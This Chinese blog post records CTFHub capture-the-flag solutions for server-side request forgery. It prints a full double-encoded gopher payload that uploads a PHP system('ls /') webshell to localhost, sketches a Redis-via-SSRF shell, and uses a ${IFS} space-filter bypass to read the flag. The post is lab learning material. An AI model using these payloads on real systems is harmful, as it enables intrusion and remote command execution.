ctf web方向与php学习记录25(SSRF续2)

最新推荐文章于 2023-03-06 18:56:30 发布
最新推荐文章于 2023-03-06 18:56:30 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: SSRF 文章标签: web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/109584795
版权

一,文件上传
首先,http协议查看上传页面,然后file协议查看源码(详细请查看ctf web方向与php学习记录24)。
然后分析以下源码
其中,'REMOTE_ADDR’用于浏览当前页面的用户的 IP 地址。
那么只要上传的文件来源于127.0.0.1(即本机地址),则绕过第一个if。

<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

Upload Webshell

<form action="/flag.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
</form>

其次,getenv从CTFHUB获取一个环境变量的值,那么只要上传了文件,就或取一个值,很有可能获取的这个值就是flag(好吧,如果不是,我把这道题吃了)。

接下来就是上传利用gopher协议上传获得的文件请求的简单步骤了,游戏就此开始。

首先,给页面添加一个提交按钮(回车无用),然后,随意上传一个任意内容的文件,当然文件内容少一些看起来更简单(实际上没啥用处)。
在这里插入图片描述将抓到的包,进行gopher协议相对的编码,即一次编码,修改%0A为%0D%0A,然后再进行一次编码,之后构造playload上传。(具体过程详见上一片博客)

构造出来后如下:
?url=gopher%3A%2F%2F127.0.0.1%3A80%2F_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520challenge-8f1fbe70df8add3b.sandbox.ctfhub.com%25253A10080%25250D%25250AUser-Agent%25253A%252520Mozilla%25252F5.0%252520(Windows%252520NT%25252010.0%25253B%252520Win64%25253B%252520x64%25253B%252520rv%25253A82.0)%252520Gecko%25252F20100101%252520Firefox%25252F82.0%25250D%25250AAccept%25253A%252520text%25252Fhtml%25252Capplication%25252Fxhtml%25252Bxml%25252Capplication%25252Fxml%25253Bq%25253D0.9%25252Cimage%25252Fwebp%25252C*%25252F*%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AAccept-Encoding%25253A%252520gzip%25252C%252520deflate%25250D%25250AContent-Type%25253A%252520multipart%25252Fform-data%25253B%252520boundary%25253D---------------------------344229352917391990053183177803%25250D%25250AContent-Length%25253A%252520369%25250D%25250AOrigin%25253A%252520http%25253A%25252F%25252Fchallenge-8f1fbe70df8add3b.sandbox.ctfhub.com%25253A10080%25250D%25250AConnection%25253A%252520close%25250D%25250AReferer%25253A%252520http%25253A%25252F%25252Fchallenge-8f1fbe70df8add3b.sandbox.ctfhub.com%25253A10080%25252F%25253Furl%25253D127.0.0.1%25252Fflag.php%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------344229352917391990053183177803%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%2525221.php%252522%25250D%25250AContent-Type%25253A%252520application%25252Foctet-stream%25250D%25250A%25250D%25250APOST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250AContent-Length%25253A%25252022%25250D%25250A%25250D%25250A%25253Cphp%252520system(‘ls%252520%25252F’)%25253B%25253F%25253E%25250D%25250A-----------------------------344229352917391990053183177803–

稍等片刻,拿到flag。
在这里插入图片描述二,redis协议
首先,这道题目的关键在于对redis协议于SSFR之间的关系。
大家可以参考以下文章进行学习。
https://www.cnblogs.com/linuxsec/articles/11221756.html
接下来介绍一下我的解题步骤。
首先构造gopher协议(似乎redis不用二次编码也没事)。
于是我就用了以下的playload直接进行攻击,并未编码。
在这里插入图片描述然后,参照文章,利用shell.php远程访问,发现其中尽然又没有302.php(为什么说又,可以看看我之前的文章)。
在这里插入图片描述然后,尝试ls /,无果,存在空格过滤,${IFS}即可绕过。
在这里插入图片描述
看见flag文件。然后cat ${IFS}/flag…

在这里插入图片描述得到flag。

这周末在做梦
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3786
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTFHUB-上传文件
鸣蜩十四的博客
08-09 302
index.php文件的源码为: <?php error_reporting(0); if (!isset($_REQUEST['url'])){ header("Location: /?url=_"); exit; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLO
buuctf部分题目wp
zhhhb1005的博客
06-19 1049
主要是记录平时做题遇见的没见过的题目
[ctf学习]ctfhub技能树-web
小飒的博客
07-05 1590
背景知识 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 方法 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务器的功能性 2、HEAD 向服务器索与GET请求相一致的响应,只不过响应体将不会被返回。这一方法可以再不必传输整个响应内容的情况下,就可以获取包含在响应小消息头中的元信息。 3、GET 向特定的资源发出请求。注意:GET方法不应当被用于产生“副作用”的操作中,例如在Web A
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1864
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb中进行CTF挑战链接: :
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF-web学习大纲
最新发布
01-30
CTF-web学习大纲
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 958
CTFHub技能树-web-ssrf
download php ctf,FireShellCTF2019 Bad Injections解题记录
weixin_39630744的博客
04-03 379
这是整场比赛最简单的Web题…Web题质量很高,貌似现在还没有关环境主页面有四个功能,纯静态页面。右键about页面源码信息:给个本地web目录接着在list页面的源码里发现信息:因为页面显示图片,url没有其他参数,猜测应该是readfile之类的函数读的文件。File+hash的方法,既然是ctf,那hash应该不会加key。下载一个文件试一下能不能成功68.183.31.62:94/down...
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7039
在命令注入中往往会存在注入命令的长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度的限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1581
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
刷题(第二周)
qq_62046696的博客
03-06 508
感悟:代码审计的题的确非常需要耐心一个个看,所以做题应该静下心来,思路:找出可以利用的方法比如,include/file_get_contents等,然后找出__destruct起点一步步观察。这里的this->pool是我们可以控制的,所以找出一个恶意类中的 saveDeferred方法即可,最终找到了PhpArrayAdapter.php中的方法,这里虽然报错了,但还是返回了1/0我们输入的值,因为flask框架是基于python语言的,所以师傅们用的方法是#注释掉后面的,
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 1293
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
SSRF的一次浅学习(CTF-hub)
quan9i的博客
05-04 1039
网刃杯时签到题都没做出来,太菜了,特此来学习一下SSRF
CTF web题总结--绕过正则表达式
热门推荐
bob的博客
08-30 1万+
绕过正则表达式
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 1597
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
ctf web方向怎么学习
04-27
如果你想学习CTF Web方向,建议你掌握一些基本的技能,如Web开发和网络安全知识。可以从以下几个方面入手学习: 1. 学习Web开发:HTML、CSS、JavaScript、PHP、ASP.NET等等。 2. 学习网络知识:如HTTP协议、TCP/IP协议、Web安全等等。 3. 学习常见的Web漏洞分析:如SQL注入、XSS、CSRF等等。 4. 参与CTF比赛:通过参加CTF比赛来提高自己的技术水平和经验。 5. 阅读网上的安全相关博客和论坛。 希望这些能够帮助你开始学习CTF Web方向

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值